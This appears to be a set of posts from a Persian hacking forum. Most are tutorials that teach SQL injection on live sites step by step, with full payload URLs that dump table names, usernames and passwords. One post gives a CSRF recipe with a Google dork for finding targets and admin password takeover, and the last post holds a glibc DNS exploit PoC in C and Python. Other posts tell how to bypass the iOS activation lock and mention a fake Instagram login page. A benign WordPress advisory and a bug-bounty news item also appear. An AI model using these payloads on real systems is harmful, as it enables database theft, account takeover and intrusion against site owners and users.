  14. با سلام من قصد دارم در این تاپیک با شما آموزش باگ sql injection در سایت ها asp رو بدم . سطح : متوسط تفاوت mssqli و mysql : Mssql توسط شرکت مایکروسافت درست شده و با قیمت بالایی فروخته می شود و امکانات بیشتری دارد و برای هاست های ویندوز هم هست . Mysql اپن سورس و رایگان است و برای لینوکس است و قابلیت اجرا بر روی ویندوز هم دارد . ------------------------------------------------------------------------------------------------------------------------ تست آسیب پذیری ‌: به ادرس سایت ‘a را اضافه کنید . به این صورت : Site.com/news.aspx?id=4’a و با دریافت خطا یعنی سایت اسیب پذیر است . ------------------------------------------------------------------------------------------------------------------------ بیرون کشیدن اطلاعات اولیه : روش اول : Site.com/news.aspx?id=4+and+1=(convert(int,x)) روش دوم : Site.com/news.aspx?id=4+or+1=(convert(int,x)) و به جای x می توانید این مقادیر بزنید ‌: user db_name @@servername @@version Host_@@version Host_name و.... ------------------------------------------------------------------------------------------------------------------------ برای طولانی نشدن پست ادامه رو در پست های دیگر می گذارم فعلا با مقدمه آشنا بشوید . امیدوارم مورد تایید شما قرار گرفته باشه و پست خوبی رو گذاشته باشم .
  15. با سلام خدمت دوستان و مدیران عزیز سایت GUARDIRAN در این پست قصد دارم به شما آموزش متد separator رو یدم ، در آموزش متد join اگر یادتون باشه نامی از متد separator رو بردم امروز گفتم شاید مبدتی ها با این متد آشنایی نباشند و آموزشش رو بدم . متد separator‌ : در زمان مرتب سازی تیبل ها ، ستون ها و یوزرنیم و پسورد ها شما میاید از کاما برای گذاشتن تگ br (به صورت hex) استفاده می کنید : ..........(group_concat(table_name,0x3c62723e...... حالا شاید در بعضی تارگت ها سایت به کاما حساس باشد در اینجا است که باید از متد separator استفاده کنید ، به این صورت : .......( group_concat((table_name)separator 0x3c62723e...... زیاد پست رو طولانی نمی کنم و گفتم متد ساده ای هست نیاز به توضیحات ندارد . ممنون که وقت گذاشتید و این تاپیک رو تا آخر خواندید .
  16. MR.MSA

    اکسپلویت باگ CSRF

    با سلام خدمت دوستان عزیز گارد ایران من MR.MSA در این تاپیک قصد دارم یک اکسپلویت در باگ CSRF رو به شما معرفی کنم و کمی توضیح درباره این باگ برای مبتدی ها ، با من همراه باشید . -------------------- CSRF : Cross Site Request Forgery نکات باگ : معنی شده آن جعل درخواست است . این باگ را کرم تحت وب می شناسند و اثر بدی دارد . این باگ توسط سایت و فایروال شناسایی نمی شود . -------------------- نحوه حمله : این حمله به طوری است که ما با استفاده از جعل کوکی admin سایت می توانیم درخواست های جعلی بدهیم . -------------------- انجام حمله : قدم اول : گوگل دورک Google Dork : inurl:admin/admin.php Travel PORTAL ---------- قدم دوم : اکسپلویت به این ادرس بروید و اکسپلویت رو با پسوند html ذخیره کنید . exploit : https://www.exploit-db.com/exploits/15280 ---------- قدم سوم : به جای http://VICTIM/admin/admin.php آدرس سایت خود را بزنید => http://guardiran.org/admin/admin.php قدم چهارم : رمز جدید خود را بزنید . ----------------------------- امید وارم از این تاپیک لذت برده باشید و اکسپلویت مورد تایید شما قرار گرفته باشه . اگه مشکلی داشت به خوبی خودتون ببخشید سعی کردم تاپیک رو جوری بنویسم که همه بتوانند استفاده کنند . ******************** MR.MSA ***************** <------------------------MR.MSA----------------------> -------- پیج فیک ------- <صفحه لاگین اینستاگرام (فیک)> ------- باگ -------- <آموزش متد polygon در sql injection > <آموزش متد join در sql injection > <نکته مهم در متد join > ------- افزونه -------- <افزونه Wapplyzer (اسکنر سایت ) > <افزونه اسکن سایت های wordpress> <افزونه whatruns (جمع آوری اطلاعات سایت)> <------------------------MR.MSA----------------------/>
  17. MR.MSA

    نکته مهم در متد join

    با سلام همانطور که در آموزش متد join در sql injection گفتم چند نکته در رابطه با متد join هست که باید بگویم که در این پست قرار است این نکات رو شرح بدم . در بعضی از تارگت ها ممکن است زمان محدود سازی سایت به = حساس باشد : union+select+*from+(select 1)a+join+(select+group_concat((table_name)+separator+0x3c62723e)+from+information_schema.tables+where+table_schema=database)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ پس شما باید از این دستور استفاده کنید : site.com/news.php?id=3+union+select+*from (select 1)a+join+(select+group_concat(table_name)+from+information_schema.tables+where+table_schema+like+’dbname’)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23 به جای dbname نام دیتابیس مورد نظر را بزنید (در بین دو کتیشن ) و اگر با مشکل مواجه شدید دو کتیشن را حذف کنید و نام دیتابیس را بصورت hex بنویسید . ------------------------------ برای بدست آوردن نام دیتابیس در متد join از این دستور استفاده کنید : site.com/news.php?id=3+union+select+*from (select 1)a+join+(select+database())b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23 ------------------------------ امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و متد join رو به خوبی یاد گرفته باشید . هر گونه سوال در مورد پست داشتید در قسمت پرسش و پاسخ بپرسید . ************ MR.MSA ************ <آموزش متد polygon در sql injection > < آموزش متد join در sql injection > <دانلود نسخه های ۲۰۱۸ و ۲۰۱۹ کالی لینوکس> <دانلود نسخه های ۲۰۱۶ و ۲۰۱۷ کالی لینوکس> <دانلود نسخه های ۱ تا ۲ کالی لینوکس >
  18. با سلام خدمت کاربران و مدیران انجمن گارد ایران من MR.MSA در این پست قصد دارم متد polygon رو به شما آموزش بدهم . ------------------------------------ یکی از کاربرد های متد polygon زمانی است که :‌ در یک تارگت order+by و ... را زدید و تعداد تیبل ها را بدست اوردید و بعد خواستید تیبل ها را بیرون بکشید و با خطای error different number of columns مواجه شدید می توانید از متد polygon استفاده کنید . یکی دیگر از کاربرد های متد polygon زمانی است که :‌ با خطای Unknown column “language’ in ‘field list’ مواجه می شوید می توانید از متد polygon استفاده کنید . ------------------------------------ سطح متد : حرفه ای ------------------------------------ روش استفاده از متد polygon :‌ ابتدا مقدار را پاک کنید : site.com/news.php?id=1 ( نکته : در سایت های که مثلا دو مقدار است آن مقدار را پاک می کنید که اسیب پذیر است و بعد مراحل را پیش می روید . ) -------------- سپس این عبارت را قرار می دهید : http://site.com/news.php/id=polygon((select*from(select*from(select@@version)f)x)) و اگر ورژن را به شما نمایش داد یعنی می توانید از متد polygon استفاده کنید . یک جورایی میشه گفت جای که version است ستون آسیب پذیره. -------------- خب حالا می رویم سراغ بیرون کشیدن تیبل ها : site.com/news.php/id=polygon((select*from(select*from(select@@group_concat(table_name) from information_schema.tables where table_schema=database())f)x)) قسمت های بنفش قسمت هایی هستند که تازه اضافه شده اند . توجه داشته باشید که به دلایلی دو (( آخر دستور در جاهای دیگر قرار گرفته اند اما در نگاه به این شکل است ولی زمانی که شما این دستور را کپی کنید و به url تارگت اضافه کنید درست نمایش داده می شود . ( در تمامی دستورات به همین شکل است ،‌ پس نگران نباشید 😁) -------------- (برای مثال تیبل مهمی که بدست می آوریم user است ) و حالا برای بیرون کشیدن ستون های یک جدول : site.com/news.php/id=polygon((select*from(select*from(select@@group_concat(column_name)+from+information_schema.columns+where+table_name=’user’)f)x)) قسمت های بنفش قسمت های جدید هستند و باید به جای user نام تیبل مهم خود را بنویسید(در کتیشن ) اگر با مشکل مواجه شدید دو کتیشن را بردارید و نام تیبل خود را به صورت hex بنویسید . -------------- و می مونه بیرون کشیدن اطلاعات ستون های مهم : site.com.news.php/id=polygon((select*from(select*from(select@@group_concat(user,0x3a,pass) from ‘user’)f)x)) باید به جای user نام تیبل مهم خود را بنویسید(در کتیشن ) و به جای user و pass نام ستون مهم خود را بنویسید . اگر با مشکل مواجه شدید دو کتیشن را بردارید و نام تیبل خود را به صورت hex بنویسید . ------------------------------------ امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و اینکه در متد polygon یک نکته های مونده که باید بگویم برای پیچیده نشدن پست نگفتم و حتما در پست بعدی توضیح می دهم . هر گونه سوال در مورد پست داشتید در قسمت سوال و جواب بپرسید . ************ MR.MSA ************* < آموزش متد join در sql injection > <دانلود نسخه های ۲۰۱۸ و ۲۰۱۹ کالی لینوکس> <دانلود نسخه های ۲۰۱۶ و ۲۰۱۷ کالی لینوکس> <دانلود نسخه های ۱ تا ۲ کالی لینوکس >
  19. MR.MSA

    متد join در sql injection

    با سلام خدمت شما کاربران عزیز انجمن گارد ایران در این پست می خواهم متد join رو در باگ sql injection به شما آموزش بدهم . ------------------------ موارد قابل استفاده : ۱- مواجه شدن با خطا زمان استفاده از union select ۲- مواجه شدن با خطای : 'Unknown column ‘activo’ in ‘field list ۳- زمانی که سایت به عدد حساس است . ۴- و.... ------------------------ نکته :‌ در بیشتر سایت هایی که از متد join استفاده می شود سایت به + و یا به فاصله حساس است و شما به جای فاصله باید از /**/ استفاده کنید که من برای راحتی شما عزیزان فایلی را قرار دادم که در متد join به جای فاصله ها از /**/ استفاده شده . ------------------------ نحوه استفاده از متد join :‌ ---------------------------------------- ( برای مثال تعداد تیبل های سایت ۵ تا می باشد. ) مرحله اول بیرون کشیدن ستون آسیب پذیر :‌ +union+select+*from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select 5)e%23+ و همینطور تا اخر یعنی a و b و c باید کنار ( مقدار select ) قرار داشته باشند و مثلا ۱ می شود a و ۲ می شود b و به همین صورت و بین هر کدام یک join زمانی که به اخر رسدید دیگه join نمی خواهد و اینکه در اول باید بنویسید : from * توجه داشته باشید که هر عدد تبدیل شده است به یک سلکت (مقدار عدد ) ، یک حرف و join ---------------------------------------- ( برای مثال در خروجی ستون ۲ را نشان می دهد و ستون ۲ آسیب پذیر است. ) مرحله دوم بدست آوردن ورژن : +union+select+*from (select 1)a+join+(select version())b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23 ---------------------------------------- مرحله سوم بیرون کشیدن جدول (table) های دیتابیس (و محدود سازی تیبل ها برای نشان ندادن تیبل های سیستمی ) : union+select+*from+(select 1)a+join+(select+group_concat((table_name)+separator+0x3c62723e)+from+information_schema.tables+where+table_schema=database)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ توجه داشته باشید در بیشتر سایت ها سایت به , حساس است به همین دلیل ما از متد separator برای مرتب سازی تیبل ها و تگ <br> استفاده کردیم و شما در صورت لزوم می توانید آن بخش هایی که بکگراند سفید دارند را حذف کنید . ---------------------------------------- ( برای مثال در بین تیبل ها تیبل msa_users وجود دارد . ) مرحله چهارم بیرون کشیدن ستون های یک تیبل : union+select+*from+(select 1)a+join+(select+group_concat(column_name)+from+information_schema.columns+where+table_name+like+'msa_users')b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ به جای msa_users نام تیبل مهم خود را بنویسید و می توانید برای مرتب سازی ستون ها از متد separator مانند مرحله سوم استفاده کنید . ما از متد like هم استفاده کردیم و اینکه توجه داشته باشید که بیشتر مراحل مثل یونیم بیس هست . ---------------------------------------- ( برای مثال در خروجی ستون های user و pass مهم است . ) مرحله پنجم بیرون کشیدن اطلاعات در ستون های یک تیبل : union+select+*from+(select 1)a+join+(select+group_concat(user using ascii)+from+'msa_users')b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ به جای msa_users نام تیبل مهم خود را بنویسید و به جای user نام ستون مهم خود را بنویسید. می توانید برای مرتب سازی یوزرنیم ها از متد separator مانند مرحله سوم استفاده کنید. و اینکه این یک بار برای یوزرنیم بود و برای پسورد به جای user می نویسید pass ( نام ستون مهم که مربوط به pass است ) ---------------------------------------- امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و اینکه در متد join یک نکته های مونده که باید بگویم برای پیچیده نشدن پست نگفتم و حتما در پست بعدی توضیح می دهم منتظر کامنت های شما هستم . هر گونه سوال در مورد پست داشتید بپرسید . ********* MR.MSA ********** Join method in sql injection.txt
  20. بچه ها این آسیب‌پذیری با شماره CVE-۲۰۱۹-۱۱۰۴۳ ردیابی میشه و به مهاجمان اجازه میده تا با دسترسی به یک URL ساخته شده، دستوراتی را روی سرورها اجرا کنن. بهره‌برداری از این آسیب‌پذیری به سادگی انجام میشه و کد اثبات مفهومی (PoC) اون به صورت عمومی توی گیت‌هاب منتشر شده و در دسترس همه هست اسکریپت PoC موجود در گیت‌هاب می‌تونه از طریق وب سرور مورد نظر، وجود آسیب‌پذیری رو بررسی کنه و وقتی که یک هدف آسیب‌پذیر شناسایی بشه، مهاجم میتونه به سرور وب آسیب‌پذیر، درخواست دستکاری شده ارسال کنه البته همه سرورهای مبتنی بر PHP تحت تأثیر قرار نمی‌گیرن و فقط سرورهای NGINX که ویژگی PHP-FPM اونا فعال باشه آسیب‌پذیر هستن
  21. یک باگ امنیتی در سیستم عامل iOS 11 به هکرها و هر فرد دیگری اجازه می‌دهد تا با استفاده از یک رمزعبور نادرست که در صفحه تنظیمات اولیه وارد کرده، از قفل فعالسازی آی‌کلود عبور کند. شاید این موضوع کمی عجیب به نظر برسد، اما یکی از یوتیوبرهای معروف به نام EverythingApplePro موفق شد تا با استفاده از این روش، از قفل فعالسازی آیفون 7 و آیفون 8 عبور نماید. برای این کار کافیست هر رمزعبوری را که مدنظرتان بود چندبار پشت‌ سر هم در صفحه مربوط به قفل آی‌کلود وارد کنید تا دستگاه در پس‌زمینه فعال شده و از این قفل عبور کنید. گاهی اوقات باید حدود یک ساعت منتظر بمانید تا دوباره پنجره وارد کردن رمزعبور ظاهر شده و با وارد کردن رمز عبور دلخواهتان، این قفل فعالسازی را به راحتی دور بزنید. گفته می‌شود این باگ بر روی نسخه iOS 11.1 که جدیدترین نسخه سیستم عامل اپل می‌باشد نیز وجود داشته و بنابراین کاربرانی که با ذوق و شوق فراوان گوشی آیفون ایکس گران قیمت خود را تحویل می‌گیرند نیز در معرض این آسیب‌پذیری خواهند بود. هنوز مشخص نیست که آیا این مشکل امنیتی در نسخه‌های بتا اخیر این نسخه از iOS وجود دارد یا خیر، اما به هر حال انتظار می‌رود اپل هر چه زودتر اقداماتی را برای رفع آن انجام دهد. این اولین باری نیست که چنین آسیب‌پذیری‌هایی در یک گوشی آیفون دیده می‌شود، اما اپل معمولا به نحو مناسبی(هر چند نه خیلی سریع) به این گونه مشکلات رسیدگی می‌کند. بدون شک اپل هم‌اکنون از وجود چنین باگی باخبر بوده و امیدواریم این بار راه‌حل خود را سریع‌تر از دفعات گذشته ارائه کند. خصوصا این روزها که تعداد فعالسازی‌های آیفون ایکس قرار است شمرده شود! منبع: ترجمه sakhtafzar از news.softpedia
  22. اگر وبسایت وردپرس دارید حتما به نسخه 4.8.3 بروزرسانیش کنید. Severity Medium Patch available YES Number of vulnerabilities 1 CVSSv2 5 (AV:N/AC:M/Au:N/C:P/I:P/A:P/E:U/RL:OF/RC:C) CVSSv3 6.3 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:U/RL:O/RC:C] CVE ID N/A CWE ID CWE-89 Exploitation vector Network Public exploit Not available Vulnerable software WordPress Vulnerable software versions WordPress 4.8.2 WordPress 4.8.1 WordPress 4.8 Show more Vendor URL WordPress.ORG Advisory type Public Security Advisory 1) SQL injection Description The vulnerability allows a remote attacker to execute arbitrary SQL commands in application's database. The vulnerability exists due to an error in $wpdb->prepare() that can lead to SQL injection attacks exploited via third-party software. Successful exploitation of the vulnerability may allow an attacker to execute arbitrary SQL commands in web application database. Remediation Update to version 4.8.3. External links https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/
  23. هم اکنون بسیاری از ما اپلیکیشن‌های کاربردی مورد نیاز خود را از فروشگاه‌های آنلاینی همچون گوگل پلی استور و اپ استور تهیه می‌کنیم. استفاده تعداد زیادی از کاربران گوشی‌های اندرویدی از برنامه‌های گوگل پلی استور و وجود برنامه‌های مخرب در این فروشگاه، باعث شده است گوگل این بار دست روی گوگل پلی بگذارد و برای حفظ امنیت برنامه‌های موجود در این فروشگاه وارد عمل شود، اما از طریق خود کاربران! گوگل با توسعه برنامه‌ای با نام Google Play Security Reward Program به کسانی که در زمینه کشف باگ‌ها و حفره‌های امنیتی متخصص هستند فرصت می‌دهد تا باگ‌هایی که تشخیص داده‌اند را به گوگل معرفی کنند و در ازای هر باگ تشخیص داده شده به آن‌ها 1000 دلار به عنوان جایزه بدهد! البته گوگل این برنامه را به تنهایی طراحی نکرده است بلکه کمپانی HackerOne هم در این زمینه با گوگل همکاری داشته است. غول جستجو برای شروع، تنها برنامه‌های پرطرف‌دار و مهم را هدف قرار داده است و محققان امنیتی در حال حاضر تنها می‌توانند با تشخیص حفره‌های امنیتی موجود در برنامه‌های DropBox، line، Duolingo، SnapChat، Tinder، Alibaba، Mail.ru و Headspace از گوگل جایزه بگیرند. شاید گوگل در آینده نه چندان دور برای سایر برنامه‌های کم اهمیت‌تر هم این روال را در نظر بگیرد. البته این اولین اقدام گوگل برای افزایش امنیت و کشف حفره‌های امنیتی موجود در سرویس‌ها و برنامه‌هایش نیست، قبلاً هم چنین اقدامی در مورد گوگل کروم انجام شده بود که اتفاقاً با موفقیت هم همراه بود. اگر شما هم در زمینه تشخیص باگ و حفره‌های امنیتی متخصص هستید این فرصت را از دست ندهید، حفره‌ها را یافته و از گوگل جایزه بگیرید. این هم باید در نظر گرفت که اگر گوگل بتواند توجه ها را به برنامه های امن جلب کند باز هم ممکن است اتفاقاتی مثل استفاده جاسوسی از یک نسخه ی نرم افزار CCleaner در آینده با استفاده از این سرویس ها رخ دهد.
  24. سلام دوستان خوبم تو این درس تصویری شما با باگ RFi که یکی از باگ های معروف و قدیمی هست اشنا میشید . یاد میگیرید سایت های که این باگ رو دارند شناسایی کنید و همچنین یاد میگیرید که چطوری این باگ رو Patch کنید . اموزش واقعا مفیدی هستش امید وارم که نهایت استفادروببرید. Pass:guardiran.org RFI.rar
  25. با سلام. امروز اسکریپتی اوردم که میتوان تست کرد ایا سیستم شما باگ glibc دار دارد یا نه ؟؟ توجه:این اسکریپت فقط برای لینوکس هست!! این اسکریپت به دو زبان C & Python نوشته شده است. C: #include <sys/socket.h> #include <netdb.h> #include <err.h> #include <stdio.h> #include <string.h> int main(void) { struct addrinfo hints, *res; int r; memset(&hints, 0, sizeof(hints)); hints.ai_socktype = SOCK_STREAM; if ((r = getaddrinfo("foo.bar.google.com", "22", &hints, &res)) != 0) errx(1, "getaddrinfo: %s", gai_strerror(r)); return 0; } Python: import socket import time import struct import threading IP = '127.0.0.1' # Insert your ip for bind() here... ANSWERS1 = 184 terminate = False last_reply = None reply_now = threading.Event() def dw(x): return struct.pack('>H', x) def dd(x): return struct.pack('>I', x) def dl(x): return struct.pack('<Q', x) def db(x): return chr(x) def udp_thread(): global terminate # Handle UDP requests sock_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock_udp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock_udp.bind((IP, 53)) reply_counter = 0 counter = -1 answers = [] while not terminate: data, addr = sock_udp.recvfrom(1024) print '[UDP] Total Data len recv ' + str(len(data)) id_udp = struct.unpack('>H', data[0:2])[0] query_udp = data[12:] # Send truncated flag... so it retries over TCP data = dw(id_udp) # id data += dw(0x8380) # flags with truncated set data += dw(1) # questions data += dw(0) # answers data += dw(0) # authoritative data += dw(0) # additional data += query_udp # question data += '\x00' * 2500 # Need a long DNS response to force malloc answers.append((data, addr)) if len(answers) != 2: continue counter += 1 if counter % 4 == 2: answers = answers[::-1] time.sleep(0.01) sock_udp.sendto(*answers.pop(0)) reply_now.wait() sock_udp.sendto(*answers.pop(0)) sock_udp.close() def tcp_thread(): global terminate counter = -1 #Open TCP socket sock_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock_tcp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock_tcp.bind((IP, 53)) sock_tcp.listen(10) while not terminate: conn, addr = sock_tcp.accept() counter += 1 print 'Connected with ' + addr[0] + ':' + str(addr[1]) # Read entire packet data = conn.recv(1024) print '[TCP] Total Data len recv ' + str(len(data)) reqlen1 = socket.ntohs(struct.unpack('H', data[0:2])[0]) print '[TCP] Request1 len recv ' + str(reqlen1) data1 = data[2:2+reqlen1] id1 = struct.unpack('>H', data1[0:2])[0] query1 = data[12:] # Do we have an extra request? data2 = None if len(data) > 2+reqlen1: reqlen2 = socket.ntohs(struct.unpack('H', data[2+reqlen1:2+reqlen1+2])[0]) print '[TCP] Request2 len recv ' + str(reqlen2) data2 = data[2+reqlen1+2:2+reqlen1+2+reqlen2] id2 = struct.unpack('>H', data2[0:2])[0] query2 = data2[12:] # Reply them on different packets data = '' data += dw(id1) # id data += dw(0x8180) # flags data += dw(1) # questions data += dw(ANSWERS1) # answers data += dw(0) # authoritative data += dw(0) # additional data += query1 # question for i in range(ANSWERS1): answer = dw(0xc00c) # name compressed answer += dw(1) # type A answer += dw(1) # class answer += dd(13) # ttl answer += dw(4) # data length answer += 'D' * 4 # data data += answer data1_reply = dw(len(data)) + data if data2: data = '' data += dw(id2) data += 'B' * (2300) data2_reply = dw(len(data)) + data else: data2_reply = None reply_now.set() time.sleep(0.01) conn.sendall(data1_reply) time.sleep(0.01) if data2: conn.sendall(data2_reply) reply_now.clear() sock_tcp.shutdown(socket.SHUT_RDWR) sock_tcp.close() if __name__ == "__main__": t = threading.Thread(target=udp_thread) t.daemon = True t.start() tcp_thread() terminate = True